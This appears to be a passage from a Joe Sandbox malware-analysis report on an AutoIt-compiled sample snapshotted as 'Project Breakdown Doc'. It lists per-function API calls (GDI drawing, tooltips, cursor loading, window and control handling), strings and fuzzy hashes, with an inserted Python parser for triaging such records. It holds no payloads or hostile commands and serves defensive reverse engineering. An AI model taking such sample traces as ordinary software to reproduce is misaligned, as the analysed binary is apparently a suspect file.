                                                  • Instruction Fuzzy Hash: 85811971600245BBDB24ABA0CC82FAF7768FF16700F048165FD55AA1C6EB60DB45F2A2
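Every function record on this page has the same shape: an "APIs" list of `Name.MODULE(args), ref: ADDR` lines (subcall lines indented under the caller), a "Memory Dump Source", and a "Similarity" block whose `String ID` carries the `$`-joined strings and whose fuzzy hashes identify the function across reports. The following is an added example, not Joe Sandbox's plugin code, that parses records of this shape into structured objects and derives three triage views a reverser wants when most of a dump is interpreter code: which records carry strings characteristic of the AutoIt v3 runtime (the report already flags the binary as a compiled AutoIt script), a histogram of the functions' own API calls, and an Instruction Fuzzy Hash index for diffing two reports' function sets. The record format is inferred from the text of this page; the sample input is constructed by copying three records from this page and trimming them to the fields the parser reads, and the marker set `AUTOIT_RUNTIME_MARKERS` is this example's own choice.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample input: three records copied from the report above and
# trimmed to the fields this parser reads (the first record's API list and
# the Opcode/Instruction ID lines were cut, the rest is verbatim).
SAMPLE = r"""
APIs
• SetTextColor.GDI32(?,00000000), ref: 00CCA89F
• GetWindowLongW.USER32(?,000000F0), ref: 00CCA9FD
  • Part of subcall function 00CCAB60: GetSysColor.USER32(00000012), ref: 00CCAB99
Memory Dump Source
• Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
• API String ID: 4124339563-0
• Instruction Fuzzy Hash: A8A17C72408305AFD7109F64DC08F6F7BAAFB88325F144A2DFAA2961E0D771D946CB52
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00CAAF89
• GetDriveTypeW.KERNEL32(?,00CCFAC0,?,\\.\,00CCF910), ref: 00CAB066
• SetErrorMode.KERNEL32(00000000,00CCFAC0,?,\\.\,00CCF910), ref: 00CAB1C4
Strings
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Instruction Fuzzy Hash: F751B57068430BAB8B04EB91CD92D7DB7B1FB563497204026F61EA7292C775AE41EB43
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Instruction Fuzzy Hash: 85811971600245BBDB24ABA0CC82FAF7768FF16700F048165FD55AA1C6EB60DB45F2A2
"""

# One API line. Three shapes occur in the report:
#   • Name.MODULE(args), ref: ADDR
#   • Name.MODULE ref: ADDR                      (no argument list)
#   • Part of subcall function X: Name.MODULE(args), ref: ADDR
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$"
)
# Any other "• Key: value" line (Similarity fields, Source File, ...).
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Strings the report itself surfaces that belong to the AutoIt v3 interpreter
# (script directives, the interpreter's window class, DriveGetType names).
# This set is the example's own choice, used to separate runtime code from
# script-specific logic.
AUTOIT_RUNTIME_MARKERS = {
    "AutoIt v3", "#requireadmin", "#include-once", "#notrayicon",
    "#OnAutoItStartRegister", "#pragma compile", "FileBackedVirtual", "RAMDisk",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None = None   # address of the callee when listed as a subcall


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    @property
    def strings(self) -> list[str]:
        raw = self.fields.get("String ID", "")
        return raw.split("$") if raw else []


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing into records; each record starts at an 'APIs' header."""
    records: list[FunctionRecord] = []
    section = None
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            records.append(FunctionRecord())
            section = "APIs"
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if not records or not line.startswith("•"):
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                records[-1].apis.append(ApiCall(m.group("name"), m.group("module"),
                                                args, m.group("ref"), m.group("sub")))
            continue
        m = FIELD_RE.match(line)
        if m:
            records[-1].fields[m.group("key")] = m.group("val").strip()
    return records


def autoit_runtime_records(records: list[FunctionRecord]) -> list[int]:
    """Indices of records whose strings include an AutoIt runtime marker."""
    return [i for i, r in enumerate(records) if set(r.strings) & AUTOIT_RUNTIME_MARKERS]


def api_histogram(records: list[FunctionRecord]) -> dict[str, int]:
    """Count the functions' own API calls (subcall lines are excluded)."""
    counts: dict[str, int] = {}
    for r in records:
        for a in r.apis:
            if a.subcall_of is None:
                counts[f"{a.module}!{a.name}"] = counts.get(f"{a.module}!{a.name}", 0) + 1
    return counts


def fuzzy_index(records: list[FunctionRecord]) -> dict[str, str]:
    """Instruction Fuzzy Hash -> API ID, for diffing two reports' function sets."""
    return {r.fields["Instruction Fuzzy Hash"]: r.fields.get("API ID", "")
            for r in records if "Instruction Fuzzy Hash" in r.fields}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", "runtime records:", autoit_runtime_records(recs))
    print(api_histogram(recs))
```

Run against the full listing, the fuzzy-hash index lets you subtract functions already seen in a clean AutoIt3 build from a new report, so the review effort goes to the handful of records that are script-specific rather than the GDI, tooltip and control-handling code that every compiled AutoIt binary carries.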
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00CCAB99
                                                  • SetTextColor.GDI32(?,?), ref: 00CCAB9D
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00CCABB3
                                                  • GetSysColor.USER32(0000000F), ref: 00CCABBE
                                                  • CreateSolidBrush.GDI32(?), ref: 00CCABC3
                                                  • GetSysColor.USER32(00000011), ref: 00CCABDB
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCABE9
                                                  • SelectObject.GDI32(?,00000000), ref: 00CCABFA
                                                  • SetBkColor.GDI32(?,00000000), ref: 00CCAC03
                                                  • SelectObject.GDI32(?,?), ref: 00CCAC10
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00CCAC2F
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCAC46
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00CCAC5B
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CCACA7
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CCACCE
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00CCACEC
                                                  • DrawFocusRect.USER32(?,?), ref: 00CCACF7
                                                  • GetSysColor.USER32(00000011), ref: 00CCAD05
                                                  • SetTextColor.GDI32(?,00000000), ref: 00CCAD0D
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CCAD21
                                                  • SelectObject.GDI32(?,00CCA869), ref: 00CCAD38
                                                  • DeleteObject.GDI32(?), ref: 00CCAD43
                                                  • SelectObject.GDI32(?,?), ref: 00CCAD49
                                                  • DeleteObject.GDI32(?), ref: 00CCAD4E
                                                  • SetTextColor.GDI32(?,?), ref: 00CCAD54
                                                  • SetBkColor.GDI32(?,?), ref: 00CCAD5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: a55c2368595ff2b570465a916aab2dc1e55d61d0d690da4b03ecfa2470bf418a
                                                  • Instruction ID: bbec76a035e6ae6a4d5eca8fe1fb5de0ab5dfe6159a32d77a20d905f2e2518e7
                                                  • Opcode Fuzzy Hash: a55c2368595ff2b570465a916aab2dc1e55d61d0d690da4b03ecfa2470bf418a
                                                  • Instruction Fuzzy Hash: E2613C71900218EFDF119FA8DC48FAE7B7AFB08324F148129F915AB2A1D7759E41DB90
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CC8D34
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC8D45
                                                  • CharNextW.USER32(0000014E), ref: 00CC8D74
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CC8DB5
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CC8DCB
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC8DDC
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CC8DF9
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00CC8E45
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CC8E5B
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CC8E8C
                                                  • _memset.LIBCMT ref: 00CC8EB1
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CC8EFA
                                                  • _memset.LIBCMT ref: 00CC8F59
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CC8F83
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CC8FDB
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00CC9088
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00CC90AA
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CC90F4
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CC9121
                                                  • DrawMenuBar.USER32(?), ref: 00CC9130
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00CC9158
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: 011d774e55837f4f79f187dfb8649648294944ea4819711f8ef0d4c223ae4d35
                                                  • Instruction ID: 801dc3dbe53c37e87a8b81d67954220eec880bcc6b944d8dc214dcbb99f80c79
                                                  • Opcode Fuzzy Hash: 011d774e55837f4f79f187dfb8649648294944ea4819711f8ef0d4c223ae4d35
                                                  • Instruction Fuzzy Hash: B6E17270900219ABDF209F55CC89FEF7BB9EF05710F14815DF926AA290DB709A85DF60
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00CC4C51
                                                  • GetDesktopWindow.USER32 ref: 00CC4C66
                                                  • GetWindowRect.USER32(00000000), ref: 00CC4C6D
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CC4CCF
                                                  • DestroyWindow.USER32(?), ref: 00CC4CFB
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CC4D24
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC4D42
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CC4D68
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00CC4D7D
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CC4D90
                                                  • IsWindowVisible.USER32(?), ref: 00CC4DB0
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CC4DCB
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CC4DDF
                                                  • GetWindowRect.USER32(?,?), ref: 00CC4DF7
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00CC4E1D
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00CC4E37
                                                  • CopyRect.USER32(?,?), ref: 00CC4E4E
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00CC4EB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 0f3372717c8cf68a239680f5e23b18f90b2dbf9be479d4be62a7f47ae2331709
                                                  • Instruction ID: 5754f5f2e3820d34cd13f47fdf4cff8b6037201ee5aa53b39a295a58a0120e7a
                                                  • Opcode Fuzzy Hash: 0f3372717c8cf68a239680f5e23b18f90b2dbf9be479d4be62a7f47ae2331709
                                                  • Instruction Fuzzy Hash: E5B14771604350AFDB08DF65C898F6ABBE5FB88710F00891CF59A9B2A1DB71ED05CB91
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C428BC
                                                  • GetSystemMetrics.USER32(00000007), ref: 00C428C4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C428EF
                                                  • GetSystemMetrics.USER32(00000008), ref: 00C428F7
                                                  • GetSystemMetrics.USER32(00000004), ref: 00C4291C
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C42939
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C42949
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C4297C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C42990
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00C429AE
                                                  • GetStockObject.GDI32(00000011), ref: 00C429CA
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C429D5
                                                    • Part of subcall function 00C42344: GetCursorPos.USER32(?), ref: 00C42357
                                                    • Part of subcall function 00C42344: ScreenToClient.USER32(00D067B0,?), ref: 00C42374
                                                    • Part of subcall function 00C42344: GetAsyncKeyState.USER32(00000001), ref: 00C42399
                                                    • Part of subcall function 00C42344: GetAsyncKeyState.USER32(00000002), ref: 00C423A7
                                                  • SetTimer.USER32(00000000,00000000,00000028,00C41256), ref: 00C429FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 752874d510cbdffb7ca56d3ad73f296c7b57b07ebcd73658a2e36def93f3b8e1
                                                  • Instruction ID: 02d21737d129b77a630be2badbd3c633da4057fb36be372bfa6f7e839ada5e85
                                                  • Opcode Fuzzy Hash: 752874d510cbdffb7ca56d3ad73f296c7b57b07ebcd73658a2e36def93f3b8e1
                                                  • Instruction Fuzzy Hash: 2FB12C71A0020A9FDB14DFA8DC85BAE7BB5FB48314F108129FA19E72E0DB74D951DB60
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00CC40F6
                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CC41B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                  • API String ID: 3974292440-719923060
                                                  • Opcode ID: a665962b1a7a29ba57f3626e4c49f7ac266199ac6fffa537771e448f4abd1fd0
                                                  • Instruction ID: 2c7644364d31715ca4c8fc11f0b7be009cf597be560b61321a708606c32c4cb4
                                                  • Opcode Fuzzy Hash: a665962b1a7a29ba57f3626e4c49f7ac266199ac6fffa537771e448f4abd1fd0
                                                  • Instruction Fuzzy Hash: F1A16E702142559BCB18EF20C9A1F6AB3A5FF84314F14896CF9A69B3D2DB30ED05DB51
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00CB5309
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00CB5314
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00CB531F
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00CB532A
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00CB5335
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00CB5340
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00CB534B
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00CB5356
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00CB5361
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00CB536C
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00CB5377
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00CB5382
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00CB538D
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00CB5398
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00CB53A3
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00CB53AE
                                                  • GetCursorInfo.USER32(?), ref: 00CB53BE
                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 00CB53E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                  • String ID:
                                                  • API String ID: 3215588206-0
                                                  • Opcode ID: ae19d6dad61383082473b2714e5cf5acae28251b835141d177f8a31ac3478f20
                                                  • Instruction ID: def055ea4e983f0f2aeef533ac5084acce263148ce897a1ad66bc90c798be8af
                                                  • Opcode Fuzzy Hash: ae19d6dad61383082473b2714e5cf5acae28251b835141d177f8a31ac3478f20
                                                  • Instruction Fuzzy Hash: C2415070E043196ADB109FBA8C49DAFFEF8EF51B50F10452FE519E7290DAB8A5018E61
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C9AAA5
                                                  • __swprintf.LIBCMT ref: 00C9AB46
                                                  • _wcscmp.LIBCMT ref: 00C9AB59
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C9ABAE
                                                  • _wcscmp.LIBCMT ref: 00C9ABEA
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00C9AC21
                                                  • GetDlgCtrlID.USER32(?), ref: 00C9AC73
                                                  • GetWindowRect.USER32(?,?), ref: 00C9ACA9
                                                  • GetParent.USER32(?), ref: 00C9ACC7
                                                  • ScreenToClient.USER32(00000000), ref: 00C9ACCE
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C9AD48
                                                  • _wcscmp.LIBCMT ref: 00C9AD5C
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00C9AD82
                                                  • _wcscmp.LIBCMT ref: 00C9AD96
                                                    • Part of subcall function 00C6386C: _iswctype.LIBCMT ref: 00C63874
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 4692f0b3c2f26d103af3b4169304d38d4675052f97cbab8722f0eebdcf28657b
                                                  • Instruction ID: 7236f3b5ca4fbe48abd46c727c0590720de87b2630bed21b11b630888e23f78a
                                                  • Opcode Fuzzy Hash: 4692f0b3c2f26d103af3b4169304d38d4675052f97cbab8722f0eebdcf28657b
                                                  • Instruction Fuzzy Hash: 02A1CF72204706AFDB14DF24C888FAAB7E8FF04315F104629F9A9D6590DB30EA55DBD2
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00C9B3DB
                                                  • _wcscmp.LIBCMT ref: 00C9B3EC
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C9B414
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00C9B431
                                                  • _wcscmp.LIBCMT ref: 00C9B44F
                                                  • _wcsstr.LIBCMT ref: 00C9B460
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9B498
                                                  • _wcscmp.LIBCMT ref: 00C9B4A8
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C9B4CF
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9B518
                                                  • _wcscmp.LIBCMT ref: 00C9B528
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00C9B550
                                                  • GetWindowRect.USER32(00000004,?), ref: 00C9B5B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: 2f7d815bc52b62ce7be791b29c6e6445621e10c020cbd43b9a9f2f88723e6c2c
                                                  • Instruction ID: 57d816f309f888a40f501252c9c0192e088c636527f7f6bd374990fb1aa57bd4
                                                  • Opcode Fuzzy Hash: 2f7d815bc52b62ce7be791b29c6e6445621e10c020cbd43b9a9f2f88723e6c2c
                                                  • Instruction Fuzzy Hash: DD818E71008209ABDF14DF10EA89FAA7BE8FF44314F048569FD959A0A2DB34EE45DB61
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: 47c9486875cc2dae9e8d07dcb81931a3b6ea1167331aba253425b9892fd5bc5a
                                                  • Instruction ID: bf613fc3b8f6f2b7c7bbda422226032298445949b217ae7443093b1c26facbeb
                                                  • Opcode Fuzzy Hash: 47c9486875cc2dae9e8d07dcb81931a3b6ea1167331aba253425b9892fd5bc5a
                                                  • Instruction Fuzzy Hash: 2E31BC31A04209A6DF14FBA0DE87FFE77A8EF20750F60012AB551B10E2EF616F04E952
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 00C9C4D4
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C9C4E6
                                                  • SetWindowTextW.USER32(?,?), ref: 00C9C4FD
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C9C512
